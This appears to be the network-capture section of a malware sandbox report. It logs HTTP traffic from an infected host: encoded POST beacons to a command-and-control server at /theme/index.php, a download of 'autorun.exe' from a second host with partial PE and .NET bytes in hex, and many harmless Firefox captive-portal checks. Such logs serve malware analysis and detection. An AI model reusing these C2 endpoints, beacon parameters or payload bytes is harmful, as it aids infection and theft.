Jan 18, 2024 00:34:53.871139050 CET	1286	IN	Data Raw: c6 01 00 e8 bd 20 00 00 e8 c8 e8 ff ff 83 c4 30 c7 45 e0 00 00 00 00 c7 45 e4 0f 00 00 00 c6 45 d0 00 8d 48 ff b8 f0 99 01 10 39 0d 00 9a 01 10 0f 42 0d 00 9a 01 10 83 3d 04 9a 01 10 10 51 0f 43 05 f0 99 01 10 8d 4d d0 50 e8 76 20 00 00 8b 0d 04 Data Ascii: 0EEEH9B=QCMPv r.ArP#+MQP'EU~EfAA9B=RCPM
Jan 18, 2024 00:34:54.105185032 CET	1286	IN	Data Raw: 01 10 e8 f8 1a 00 00 83 ec 18 8b cc 68 70 6e 01 10 e8 a9 1a 00 00 e8 b4 e3 ff ff 83 c4 30 48 b9 c0 99 01 10 50 6a 00 8d 45 d0 50 e8 2f 17 00 00 50 b9 c0 99 01 10 e8 24 19 00 00 8d 4d d0 e8 cc 18 00 00 ff 75 f8 8d 45 e8 83 ec 1c 8b cc 50 e8 ab 1a Data Ascii: hpn0HPjEP/P$MuEPhtn\g4MPEPPMhbhxn0HPjEPPM6uEPh\|n

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:53.279674053 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:34:53.519175053 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:34:53.521550894 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:34:53.770772934 CET	399	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 64 31 0d 0a 20 3c 63 3e 31 30 30 30 33 39 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 33 34 37 62 35 63 61 34 64 37 65 33 64 34 61 37 66 62 33 30 32 61 62 38 61 39 65 61 36 66 65 65 36 62 62 64 39 36 61 39 63 30 66 34 39 61 36 35 36 23 31 30 30 30 34 30 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 65 31 65 65 62 39 66 31 37 33 63 36 39 30 30 36 30 66 32 34 31 66 63 39 37 64 35 61 62 61 34 61 31 65 64 39 62 32 66 63 30 31 33 31 64 66 31 34 30 65 31 35 38 35 31 35 63 34 35 39 37 63 62 65 31 30 61 62 35 62 66 64 31 34 30 32 61 65 36 37 32 32 66 61 65 30 63 38 66 64 61 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d1 <c>1000397001+++b5937c1a99d5f9dd0347b5ca4d7e3d4a7fb302ab8a9ea6fee6bbd96a9c0f49a656#1000400001+++b5937c1ad0c0f9c34e1eeb9f173c690060f241fc97d5aba4a1ed9b2fc0131df140e158515c4597cbe10ab5bfd1402ae6722fae0c8fda#<d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:53.954739094 CET	51	OUT	GET /autorun.exe HTTP/1.1 Host: 194.33.191.102
Jan 18, 2024 00:34:54.176140070 CET	325	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 367616 Accept-Ranges: bytes Server: HFS 2.3m Set-Cookie: HFS_SID_=0.204524458618835; path=/; HttpOnly ETag: ECC1C63743BE78AF556B87DB0C2B3958 Last-Modified: Tue, 16 Jan 2024 03:09:13 GMT Content-Disposition: attachment; filename="autorun.exe";
Jan 18, 2024 00:34:54.178168058 CET	1286	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnXe @ U3`
Jan 18, 2024 00:34:54.178198099 CET	174	IN	Data Raw: 88 00 00 00 61 d2 81 1e 00 00 01 02 50 06 8f 1e 00 00 01 25 71 1e 00 00 01 1f 2e 58 d2 81 1e 00 00 01 02 50 06 8f 1e 00 00 01 25 71 1e 00 00 01 1f 58 61 d2 81 1e 00 00 01 02 50 06 8f 1e 00 00 01 25 71 1e 00 00 01 1f 4e 58 d2 81 1e 00 00 01 06 17 Data Ascii: aP%q.XP%qXaP%qNXX?o(*Ann0)soi
Jan 18, 2024 00:34:54.178247929 CET	1286	IN	Data Raw: 3c 09 00 00 00 07 02 8e 69 3d 06 00 00 00 73 0c 00 00 06 26 2a 00 00 00 46 28 2c 00 00 06 28 8d 00 00 06 02 28 1a 00 00 0a 2a 00 00 13 30 03 00 38 00 00 00 05 00 00 11 28 2c 00 00 06 28 8d 00 00 06 14 0b 02 28 1a 00 00 0a 07 3a 0d 00 00 00 02 fe Data Ascii: <i=s&F(,((08(,((:s(o9*0~ %(i(~~(i@(9( ~((&
Jan 18, 2024 00:34:54.178318024 CET	174	IN	Data Raw: 09 11 04 18 1f 11 19 06 28 1b 00 00 06 12 04 11 05 11 06 09 19 1f 16 1a 06 28 1b 00 00 06 12 03 11 04 11 05 11 06 1a 1d 1b 06 28 1b 00 00 06 12 06 09 11 04 11 05 1b 1f 0c 1c 06 28 1b 00 00 06 12 05 11 06 09 11 04 1c 1f 11 1d 06 28 1b 00 00 06 12 Data Ascii: ((((((((((
Jan 18, 2024 00:34:54.178410053 CET	1286	IN	Data Raw: 03 11 04 11 05 11 06 1f 0c 1d 1f 0d 06 28 1b 00 00 06 12 06 09 11 04 11 05 1f 0d 1f 0c 1f 0e 06 28 1b 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 11 1f 0f 06 28 1b 00 00 06 12 04 11 05 11 06 09 1f 0f 1f 16 1f 10 06 28 1b 00 00 06 12 03 11 04 11 05 11 Data Ascii: (((((((((((((
Jan 18, 2024 00:34:54.178426981 CET	174	IN	Data Raw: 00 06 17 80 19 00 00 04 7e 22 00 00 04 2a 1e 02 28 1a 00 00 0a 2a 13 30 06 00 49 03 00 00 09 00 00 11 05 8e 69 1a 5d 0a 05 8e 69 1a 5b 0b 05 8e 69 8d 1e 00 00 01 0c 03 8e 69 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 Data Ascii: ~"(0Ii]i[ii[>X8]ZZXbXb`Xb`` Y@I>B
Jan 18, 2024 00:34:54.178504944 CET	1286	IN	Data Raw: 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f Data Ascii: X8#>biXY`X?8.XXbXb`Xb``% 7 t. v.I R_Y }x _Z dY _Z dY Y_Z
Jan 18, 2024 00:34:54.178519011 CET	174	IN	Data Raw: 00 00 11 05 8e 69 1a 5d 13 06 11 05 8e 69 1a 5b 13 07 11 05 8e 69 8d 1e 00 00 01 13 08 16 13 09 16 13 0a 11 06 16 3e 06 00 00 00 11 07 17 58 13 07 16 13 0b 16 13 0e 38 4d 01 00 00 11 0e 1a 5a 13 0f 20 ff 00 00 00 13 10 16 13 11 11 0e 11 07 17 59 Data Ascii: i]i[i>X8MZ Y@F>>8%>biXY`X?8+Xb
Jan 18, 2024 00:34:54.178534985 CET	1286	IN	Data Raw: 0b 18 58 91 1f 10 62 60 11 05 11 0b 17 58 91 1e 62 60 11 05 11 0b 91 60 13 0a 11 09 13 09 11 09 11 09 28 2b 00 00 06 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 Data Ascii: Xb`Xb``(+XY@S>Ka8.>bXX__dX?8Ma _X _dX _dX _dX?i[
Jan 18, 2024 00:34:54.178566933 CET	174	IN	Data Raw: 00 77 0f 00 00 b9 1d 00 00 9f 05 00 00 15 13 00 00 84 23 00 00 0a 1c 00 00 9a 0a 00 00 f9 02 00 00 d4 24 00 00 6c 1d 00 00 98 22 00 00 90 0f 00 00 d6 16 00 00 8d 29 00 00 57 1a 00 00 6c 15 00 00 98 13 00 00 26 27 00 00 4f 0d 00 00 c6 26 00 00 b1 Data Ascii: w#$l")Wl&'O&+%+)R#.%m($ J(pQ

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:54.486440897 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:34:54.616183996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33651 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:34:55.312031031 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:34:55.442454100 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33652 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:05.626137018 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:15.920114040 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:21.474159002 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:21.605936050 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33678 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:21.696118116 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:21.825762033 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33678 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:22.104886055 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:22.235023022 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33679 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:32.247029066 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:36.925318003 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:37.057440996 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33693 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:37.323156118 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:37.454194069 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33694 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 18, 2024 00:35:37.877104998 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jan 18, 2024 00:35:38.007657051 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 17 Jan 2024 14:14:03 GMT Age: 33694 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:54.938689947 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:34:55.068205118 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28411 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:34:55.825510979 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:34:55.956523895 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28411 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:06.014345884 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:16.188245058 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:21.610079050 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:21.740497112 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28437 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:21.832886934 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:21.962861061 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28437 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:22.239228964 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:22.369154930 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28438 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:32.385130882 CET	6	OUT	Data Raw: 00 Data Ascii:
Jan 18, 2024 00:35:37.322540998 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:37.453279972 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28453 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:37.827848911 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:37.958455086 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28453 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jan 18, 2024 00:35:38.255327940 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jan 18, 2024 00:35:38.384751081 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 17 Jan 2024 15:41:24 GMT Age: 28454 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:55.341696024 CET	154	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Jan 18, 2024 00:34:55.574368000 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 62 66 38 34 33 39 31 62 64 30 39 36 61 63 39 61 30 64 31 62 66 38 38 33 30 65 32 33 36 64 30 37 32 64 61 35 35 66 65 61 38 61 38 39 66 32 65 63 65 62 65 37 39 33 36 64 63 36 34 30 34 61 65 65 35 30 62 37 34 64 34 38 35 66 35 36 63 63 64 31 62 33 34 66 2d 31 2d 5f 32 5f 65 64 39 66 33 30 35 33 65 36 63 39 65 32 61 39 35 66 34 31 61 62 63 38 34 38 33 31 33 39 33 36 37 62 66 63 30 61 61 63 64 61 38 34 38 32 62 32 61 37 65 64 39 33 35 63 63 30 31 34 31 64 39 61 30 31 65 35 31 65 31 33 31 38 30 33 62 61 64 64 62 34 33 63 2d 32 2d 5f 33 5f 39 31 38 33 35 31 31 39 64 33 61 64 61 34 64 61 35 34 31 38 63 61 63 61 32 34 31 65 34 32 32 37 33 64 66 30 35 31 66 61 38 66 38 36 62 32 62 66 66 34 61 36 65 33 35 62 39 61 34 62 34 35 65 66 37 64 66 32 2d 33 2d 5f 34 5f 39 39 61 35 36 32 31 30 63 35 39 63 62 66 64 66 34 66 31 65 66 33 62 35 32 66 33 32 35 39 33 34 30 32 63 66 35 63 64 35 65 39 63 36 39 64 62 66 65 32 62 65 63 34 35 34 38 62 36 66 36 61 62 66 35 62 65 32 2d 34 2d 5f 35 5f 65 39 64 35 37 32 30 38 66 39 62 37 65 33 38 33 34 30 31 31 61 66 39 30 33 61 30 33 34 32 34 34 32 36 65 35 37 64 66 35 65 39 38 30 38 33 64 38 64 33 61 32 65 65 37 32 62 35 37 38 31 66 61 34 30 31 63 66 35 61 36 35 37 35 35 38 62 35 63 34 64 37 33 32 62 39 39 38 66 37 35 33 37 62 65 31 35 35 33 39 63 61 35 63 39 66 64 62 37 65 66 37 37 61 65 39 36 31 65 66 33 34 63 63 36 66 35 66 36 34 39 66 30 61 37 32 30 37 63 31 39 64 36 37 38 36 34 61 65 37 63 64 38 62 30 62 64 33 61 33 32 30 30 35 38 39 32 39 65 36 36 34 65 34 33 32 39 34 38 65 30 33 37 39 38 31 63 34 66 39 2d 35 2d 0d 0a 30 0d 0a 0d 0a Data Ascii: 210 +++_1_bf84391bd096ac9a0d1bf8830e236d072da55fea8a89f2ecebe7936dc6404aee50b74d485f56ccd1b34f-1-_2_ed9f3053e6c9e2a95f41abc8483139367bfc0aacda8482b2a7ed935cc0141d9a01e51e131803baddb43c-2-_3_91835119d3ada4da5418caca241e42273df051fa8f86b2bff4a6e35b9a4b45ef7df2-3-_4_99a56210c59cbfdf4f1ef3b52f32593402cf5cd5e9c69dbfe2bec4548b6f6abf5be2-4-_5_e9d57208f9b7e3834011af903a03424426e57df5e98083d8d3a2ee72b5781fa401cf5a657558b5c4d732b998f7537be15539ca5c9fdb7ef77ae961ef34cc6f5f649f0a7207c19d67864ae7cd8b0bd3a320058929e664e432948e037981c4f9-5-0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:56.984327078 CET	181	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000397001&unit=246122658369
